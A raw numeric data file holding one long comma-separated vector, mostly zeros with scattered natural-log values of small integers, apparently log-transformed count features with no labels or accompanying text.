0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0.0, 2.302585092994046, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.95562797505323, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.189654742026425, 0, 3.6375861597263857, 0, 0, 0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 4.8991863767100545, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.93848385770662, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 2.9957322735539913, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8005740880419454, 0, 0.0, 2.8903717578961645, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.9318256327243257, 3.5263605246161616, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.624972813284271, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.3694478524670215, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.772588722239781, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.61512051684126, 0.0, 0.0, 0.0, 4.624972813284271, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 3.828641396489095, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.423390507494619, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.281419193361606, 0.0, 6.802394763324311, 0.0, 0.0, 5.375278407684165, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.7412592803704001, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 1.9459101490553132, 1.791759469228055, 0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 